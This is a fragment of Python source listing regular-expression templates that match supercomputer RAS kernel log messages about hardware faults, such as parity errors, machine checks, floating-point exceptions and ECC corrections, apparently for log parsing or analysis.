r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(SNAN\)...........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(Zero/Zero\)......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception \(int cnvt\)...[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception \(software\)...[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception \(sqrt\).......[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception summary......[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL lr={hex_address} cr={hex_address} xer={hex_address} ctr={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL m?a?x=\d+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check enable..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check summary.............[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check: i-fetch......................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine state register: machine state register: machine state register: machine state register: machine state register: machine$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL MailboxMonitor::serviceMailboxes\(\) lib_ido_error: -1114 unexpected socket error: Broken pipe$".format(hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL max number of outstanding prefetches.....\d$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory and bus summary...........................0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager / command manager address parity..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager address error.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager address parity error..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager miscompare........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager refresh...........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager RMW buffer parity.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager store buffer parity...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager strobe gate.......................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager uncorrectable error...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus denormalized number................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus inf................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus normalized number..................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus zero...............................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL miscompare............0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL msr={hex_address} dear={hex_address} esr={hex_address} fpscr={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL number of correctable errors detected in L3 directories...0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL number of correctable errors detected in L3 EDRAMs.........+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL number of lines with parity errors written to L3 EDRAMs...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL overflow exception.......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in bank [01].........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in read queue [01]...................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in read queue PLB.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in write buffer...................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error.......[01]$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus denormalized number.................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus infinity............................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus normalized number...................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus zero................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL prefetch depth for core \d................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL prefetch depth for PLB slave.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL pro(gram)?$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL problem state \(0=sup,1=usr\).......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: fp compare...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: fp cr field .............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: fp cr update.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: illegal instruction......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: imprecise exception......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: privileged instruction...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: trap instruction.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: unimplemented operation..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL quiet NaN................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL qw trapped............0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL r.+?={hex_address} r.+?={hex_address} r.+?={hex_address} r.+?={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL regctl scancom interface.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL reserved.................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round nearest............................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round toward -infinity...................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round toward \+infinity...................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round toward zero........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts internal error$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts tree/torus link training failed: wanted: .+? got: .+?$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts: bad message header: .+? \(softheader=.+?\) PSR0={eight_hex} PSR1={eight_hex} PRXF={eight_hex} PIXF={eight_hex}$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL size of DDR we are caching...............1 \(512M\)$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL size of scratchpad portion of L3.........[01] \(0M\)$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL special purpose registers:$".format( general_purpose_registers=general_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start flushing...........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start initialization.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start prefetching........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start retagging..........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL state machine....................................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine state register:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL state register: machine state register: machine state register: machine state register: machine state register: machine state re$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL store operation.............................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL summary...........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Target=ido://{LP_ADDRESS}/JTAG/\d+? Message=.+?$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL tlb error.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL turn on hidden refreshes.................[10]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error detected in directory [01]....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error detected in EDRAM bank [01]...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error detected in external DDR...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL underflow exception......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL VALIDATE_LOAD_IMAGE_CRC_IN_DRAM$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL wait state enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL write buffer commit threshold............2$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {data_address}$".format( data_address=data_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {ddr_failing_info_register}$".format( ddr_failing_info_register=ddr_failing_info_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {general_purpose_registers}$".format( general_purpose_registers=general_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {hex_address} {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {instruction_address}$".format( instruction_address=instruction_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {l3_ecc_control_register}$".format( l3_ecc_control_register=l3_ecc_control_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {l3_ecc_status_register}$".format( l3_ecc_status_register=l3_ecc_status_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {l3_global_control_register}$".format( l3_global_control_register=l3_global_control_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {machine_check_status}$".format( machine_check_status=machine_check_status),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL (FATAL|INFO) [Mm]achine [sS]tate [Rr]egister: {hex_address}$".format(hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {mask}$".format( mask=mask),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {special_purpose_registers}$".format( special_purpose_registers=special_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {symbol}$".format( symbol=symbol),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {torus_retransmission_corrected}$".format( torus_retransmission_corrected=torus_retransmission_corrected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? ddr error\(s\) detected and corrected on rank .+?, symbol .+? over .+? seconds$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? L3 directory error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? L3 EDRAM error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? microseconds spent in the rbs signal handler during .+? calls. .+? microseconds was the maximum time for a single instance of a correctable ddr.$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus non-crc error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus processor sram injection error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus processor sram reception error\(s\) \(dcr 0x02fc\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus receiver sram ecc error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus sender .+? retransmission error\(s\) \(dcr 0x.+\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4address=ip4address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus sender sram ecc error\(s\) \(dcr .+?\) detected and corrected$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? total interrupts. .+? critical input interrupts. .+? microseconds total spent on critical input interrupts, .+? microseconds max time in a critical input interrupt.$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO \d+? floating point alignment exceptions$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO \d+? torus non-crc error\(s\) \(dcr 0x02fd\) detected and corrected$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO auxiliary processor.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO byte ordering exception.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: duplicate canonical-rank \d+? to logical-rank \d mapping at line \d of node map file /.+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Error opening node map file .+?, No such file or directory$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: for node .+?, incomplete data written to core file core.+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: generated \d+? core files for program .+?$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: In packet from node .+? \({nodeid}\), message still ready for node .+? \(softheader=.+?\)$".format(nodeid=nodeid,hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: In packet from node \d+?.\d \({nodeid}\), message code \d is not \d or 4294967295 \(softheader={eight_hex} {eight_hex} {eight_hex} {eight_hex}\)$".format(nodeid=nodeid, eight_hex=eight_hex),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Missing or invalid fields on line \d+? of node map file /.+?$".format( eight_hex=eight_hex),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: pollControlDescriptors: Detected the debugger died\.$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Received signal .+?, code=.+?, errno=.+?, address={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: sendMsgToDebugger: error sending PROGRAM_EXITED message to debugger.$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Unexpected eof at line \d+? of node map file .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO core configuration register: {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO critical input interrupt \(unit=0x.+? bit=0x.+?\): warning for .+? wire, suppressing further interrupts of same type$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO critical input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO critical input interrupt {unit_id}: warning for .+? wire$".format( unit_id=unit_id),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data address space................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data cache flush parity error detected. attempting to correct$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data cache search parity error detected. attempting to correct$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data storage interrupt$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data store interrupt caused by \w+?.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ddr: activating redundant bit steering for next allocation: rank=.+? symbol=.+?$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ddr: Suppressing further CE interrupts$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO debug interrupt enable............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO debug wait enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO disable apu instruction broadcast........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO disable store gathering..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO disable trace broadcast..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO e error threshold, consider replacing the card$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO e?rror threshold, consider replacing the card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO exception syndrome register: {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO external input interrupt \(unit=0x.+? bit=0x.+?\): .+? tree receiver .+? in resynch mode$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO external input interrupt \(unit=0x.+? bit=0x.+?\): number of corrected SRAM errors has exceeded threshold.*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO external input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO floating point instr. enabled.....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO floating point operation....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO floating pt ex mode \d enable......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO force load/store alignment...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO general purpose registers:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO guaranteed data cache block touch........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO guaranteed instruction cache block touch.[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO iar {eight_hex} dear {eight_hex}$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO icache prefetch depth....................[01]$",
